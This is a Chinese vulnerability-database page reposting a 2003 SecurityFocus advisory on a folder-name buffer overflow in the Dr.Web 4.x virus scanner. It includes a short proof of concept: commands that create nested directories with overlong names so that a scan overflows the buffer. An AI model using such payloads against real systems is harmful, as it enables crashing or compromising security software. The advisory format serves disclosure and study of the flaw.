Dr.Web 4.x – Virus Scanner Folder Name Buffer Overflow (PoC)
漏洞ID | 1053742 | 漏洞类型 | |
发布时间 | 2003-03-05 | 更新时间 | 2003-03-05 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7022/info
A buffer overflow vulnerability has been reported for Dr. Web virus scanner. The vulnerability is due to insufficient bounds checking when processing folder names.
An attacker is able to exploit this vulnerability by creating a malicious folder name of excessive length. When a virus scan is initiated, processing the folder name will trigger the buffer overflow condition. Successful exploitation of this issue will result in the execution of attacker-supplied code with the privileges of the Dr. Web virus scanner process.
This vulnerability has been reported for Dr.Web version 4.28 and earlier.
set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB
mkdir /$a
mkdir /$a/$b
Or:
SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB
mkdir \?c:%A%
mkdir \?c:%B%
Netscape 4.5对讲系统覆盖文件漏洞 漏洞ID 1207104 漏洞类型 未知 发布时间 1999-03-18 更新时间 1999-03-18 CVE编号 CVE-1999-0424 CNNVD-ID CNNVD-199903-042 漏洞平台 N/A…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666